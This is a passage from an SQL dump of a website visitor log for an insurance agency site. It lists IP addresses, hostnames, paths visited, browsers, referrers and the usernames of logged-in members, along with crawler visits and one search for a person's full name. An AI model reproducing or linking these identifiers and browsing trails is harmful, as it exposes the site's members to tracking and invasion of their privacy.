6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(16574,'0b_e17ce635f56fc092657d19e76d14c731','1460473279','67.212.162.98','scan03.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(16575,'0b_bceeb02c663e1cb0cc3588dcd1973503','1460474115','108.58.88.178','ool-6c3a58b2.static.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(16577,'0b_bceeb02c663e1cb0cc3588dcd1973503','1460474116','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=222','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(16580,'0b_708050e24e60660b91d3b22e2b21516e','1460474318','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1366 x 768','','','','','','3','171',0),(16581,'0b_708050e24e60660b91d3b22e2b21516e','1460474319','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1366 x 768','','','','','','3','51',0),(16583,'0b_708050e24e60660b91d3b22e2b21516e','1460474338','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7','IE 11','us','1366 x 768','','','','EksteinFinancial','','0','51',0),(16584,'0b_708050e24e60660b91d3b22e2b21516e','1460474350','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/members/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/?a=pwdchange','',0,'Win7','IE 11','us','1366 x 768','','','','EksteinFinancial','','0','51',0),(16587,'0b_708050e24e60660b91d3b22e2b21516e','1460474361','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7','IE 11','us','1366 x 768','','','','EksteinFinancial','','0','51',0),(16590,'0b_708050e24e60660b91d3b22e2b21516e','1460474371','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1366 x 768','','','','EksteinFinancial','','0','51',0),(16592,'0b_f724e9bfa489e244191a0446542e1909','1460474962','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16595,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460475905','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16598,'0b_395781dc837dc3d911bb228f20c652a6','1460476121','52.73.200.208','ec2-52-73-200-208.compute-1.amazonaws.com','/','Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.','','',0,'Linux','Firefox 3','de','','','','','','','0','0',0),(16599,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460476673','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16601,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460476674','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16604,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460476696','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16605,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460476727','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16607,'0b_72a67389573d89b768a61077745fe624','1460477318','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(16610,'0b_72a67389573d89b768a61077745fe624','1460477318','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(16611,'0b_72a67389573d89b768a61077745fe624','1460477320','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(16613,'0b_72a67389573d89b768a61077745fe624','1460477324','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(16616,'0b_72a67389573d89b768a61077745fe624','1460477347','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(16619,'0b_281a7a6a039251747db7d8809f4a200e','1460478259','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16620,'0b_281a7a6a039251747db7d8809f4a200e','1460478270','157.55.39.132','msnbot-157-55-39-132.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16622,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460478523','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16623,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460478524','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(16626,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460478603','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16628,'0b_8d61f7d2ad42b8a57253dbcf26434fa3','1460478607','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16629,'0b_3337947ca3fb92db37c18da200120e0b','1460478746','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/?page_id=171','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','','','','','','','3','0',0),(16632,'0b_3337947ca3fb92db37c18da200120e0b','1460478746','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/members/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','','','','','','','3','0',0),(16634,'0b_fd9a410006e29247418b3639510a6476','1460478767','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/members/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/','',0,'Win7 x64','IE 10','us','1680 x 1050','','','','EksteinFinancial','','0','0',0),(16635,'0b_fd9a410006e29247418b3639510a6476','1460478783','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/members/','',0,'Win7 x64','IE 10','us','1680 x 1050','','','','EksteinFinancial','','0','51',0),(16637,'0b_fd9a410006e29247418b3639510a6476','1460478805','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 10','us','1680 x 1050','','','','EksteinFinancial','','0','51',0),(16640,'0b_fd9a410006e29247418b3639510a6476','1460478836','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1680 x 1050','','','','EksteinFinancial','','0','51',0),(16643,'0b_fd9a410006e29247418b3639510a6476','1460479132','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 10','us','1680 x 1050','','','','EksteinFinancial','','0','51',0),(16644,'0b_72a67389573d89b768a61077745fe624','1460479136','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(16646,'0b_616191a6c79ebda95820df40e8133fef','1460479527','1.93.255.3','1.93.255.3','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(16647,'0b_8dcd9ce0946b38cef1bcce7c2c10ac35','1460480170','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(16649,'0b_730f46d96f0fbbfb4c2580bd3d97e16f','1460480171','100.43.81.146','spider-100-43-81-146.yandex.com','/SSO/235_29.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(16652,'0b_830118f438a54d0bff489f960fab4a3a','1460480467','67.83.96.143','ool-4353608f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(16653,'0b_830118f438a54d0bff489f960fab4a3a','1460480469','67.83.96.143','ool-4353608f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(16656,'0b_830118f438a54d0bff489f960fab4a3a','1460480473','67.83.96.143','ool-4353608f.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(16658,'0b_830118f438a54d0bff489f960fab4a3a','1460480520','67.83.96.143','ool-4353608f.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','51',0),(16661,'0b_05bdaeba759a2e227220856ed0334343','1460481334','198.167.168.70','198.167.168.70.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empireins&pc=cosp&ptag=AFFC522F796&form=CONBDF&conlogo=CT3210127','empireins',1,'Win7 x64','IE 11','us','1024 x 768','Bing','','','','','0','0',0),(16662,'0b_05bdaeba759a2e227220856ed0334343','1460481339','198.167.168.70','198.167.168.70.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(16664,'0b_05bdaeba759a2e227220856ed0334343','1460481351','198.167.168.70','198.167.168.70.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(16665,'0b_1034af38d2f857b86b0ee72387bfabdf','1460481410','123.125.71.49','baiduspider-123-125-71-49.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(16668,'0b_3169e795c6d048d182ab016f45f20bc7','1460481410','220.181.51.80','220.181.51.80','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36','','',0,'Win10','Chrome 45','cn','','','','','','','0','0',0),(16670,'0b_898e84936d52baef7ba254429ca3ddc5','1460481487','66.249.83.147,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(16671,'0b_05bdaeba759a2e227220856ed0334343','1460481569','198.167.168.70','198.167.168.70.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','Jschwinder','','0','51',0),(16674,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460482463','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16677,'0b_0c3a5ad22a90aa9e85c0c22a2991e4fd','1460483907','205.135.136.10','gateway-1.jhancock.com','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=roisy+braver&src=IE-TopResult&FORM=IETR02&conversationid=&adlt=strict','roisy braver',1,'Win7 x64','IE 11','us','','Bing','','','','','0','0',0),(16680,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460484347','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16683,'0b_de759288f0c3265b08dae11f7c203c63','1460486190','205.203.134.197','205.203.134.197','/robots.txt','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16686,'0b_de759288f0c3265b08dae11f7c203c63','1460486202','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16689,'0b_de759288f0c3265b08dae11f7c203c63','1460486234','205.203.134.197','205.203.134.197','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16691,'0b_de759288f0c3265b08dae11f7c203c63','1460486245','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16692,'0b_de759288f0c3265b08dae11f7c203c63','1460486255','205.203.134.197','205.203.134.197','/contact/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16694,'0b_de759288f0c3265b08dae11f7c203c63','1460486265','205.203.134.197','205.203.134.197','/about-us/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16695,'0b_de759288f0c3265b08dae11f7c203c63','1460486275','205.203.134.197','205.203.134.197','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16698,'0b_de759288f0c3265b08dae11f7c203c63','1460486286','205.203.134.197','205.203.134.197','/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16700,'0b_de759288f0c3265b08dae11f7c203c63','1460486297','205.203.134.197','205.203.134.197','/carriers/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16701,'0b_de759288f0c3265b08dae11f7c203c63','1460486307','205.203.134.197','205.203.134.197','/igo/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16704,'0b_de759288f0c3265b08dae11f7c203c63','1460486320','205.203.134.197','205.203.134.197','/agent-tools/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16706,'0b_de759288f0c3265b08dae11f7c203c63','1460486330','205.203.134.197','205.203.134.197','/insentives/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16707,'0b_de759288f0c3265b08dae11f7c203c63','1460486341','205.203.134.197','205.203.134.197','/licensing-contracting/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16710,'0b_de759288f0c3265b08dae11f7c203c63','1460486351','205.203.134.197','205.203.134.197','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16712,'0b_de759288f0c3265b08dae11f7c203c63','1460486361','205.203.134.197','205.203.134.197','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16715,'0b_de759288f0c3265b08dae11f7c203c63','1460486371','205.203.134.197','205.203.134.197','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16716,'0b_de759288f0c3265b08dae11f7c203c63','1460486382','205.203.134.197','205.203.134.197','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16719,'0b_de759288f0c3265b08dae11f7c203c63','1460486392','205.203.134.197','205.203.134.197','/register/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16721,'0b_de759288f0c3265b08dae11f7c203c63','1460486402','205.203.134.197','205.203.134.197','/case-status/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16722,'0b_de759288f0c3265b08dae11f7c203c63','1460486412','205.203.134.197','205.203.134.197','/forms/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16725,'0b_de759288f0c3265b08dae11f7c203c63','1460486422','205.203.134.197','205.203.134.197','/term-quotes/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16727,'0b_de759288f0c3265b08dae11f7c203c63','1460486432','205.203.134.197','205.203.134.197','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16730,'0b_de759288f0c3265b08dae11f7c203c63','1460486442','205.203.134.197','205.203.134.197','/?page_id=169','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16733,'0b_de759288f0c3265b08dae11f7c203c63','1460486452','205.203.134.197','205.203.134.197','/members/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(16734,'0b_019b29fa83c85264746757b25bb0d9ce','1460487289','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(16736,'0b_019b29fa83c85264746757b25bb0d9ce','1460487291','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(16739,'0b_019b29fa83c85264746757b25bb0d9ce','1460487321','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(16740,'0b_019b29fa83c85264746757b25bb0d9ce','1460487332','75.99.148.62','ool-4b63943e.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','51',0),(16743,'0b_4939bffd3ea9d9011209530006e14cc9','1460487953','66.102.6.173,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(16745,'0b_499c69a5738b3a36bfd06d20bfbeca0d','1460488216','66.249.64.57','crawl-66-249-64-57.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16746,'0b_499c69a5738b3a36bfd06d20bfbeca0d','1460488225','66.249.64.62','crawl-66-249-64-62.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16748,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460490259','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(16751,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460490262','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(16752,'0b_f0ed3cc47105eb2913581c409e2e6dde','1460490621','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16755,'0b_95e442cd014133a2121bf51c18f138a4','1460491226','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16758,'0b_95e442cd014133a2121bf51c18f138a4','1460491228','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16760,'0b_bf907a11a039617ca1d610f99be9e742','1460491974','66.102.6.180,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(16763,'0b_226a3ec37b3bc39dc4933c5878d98150','1460493348','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16766,'0b_e18bb287a25d8656ee0159ef2579789c','1460495436','5.79.68.56','5.79.68.56','/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16767,'0b_e18bb287a25d8656ee0159ef2579789c','1460495447','5.79.68.56','5.79.68.56','/carriers/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16769,'0b_e18bb287a25d8656ee0159ef2579789c','1460495459','5.79.68.56','5.79.68.56','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16770,'0b_e18bb287a25d8656ee0159ef2579789c','1460495471','5.79.68.56','5.79.68.56','/igo/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16773,'0b_e18bb287a25d8656ee0159ef2579789c','1460495485','5.79.68.56','5.79.68.56','/forms/','Mozilla/5.0 (compatible; LinkpadBot/1.07; +http://www.linkpad.ru)','','',0,'','','ru','','','','','','','0','0',0),(16776,'0b_e18bb287a25d8656ee0159ef2579789c','1460495496','5.79.68.56','5.79.68.56','/register/','Mozilla/5.0 (compatible; LinkpadBot/1.07; 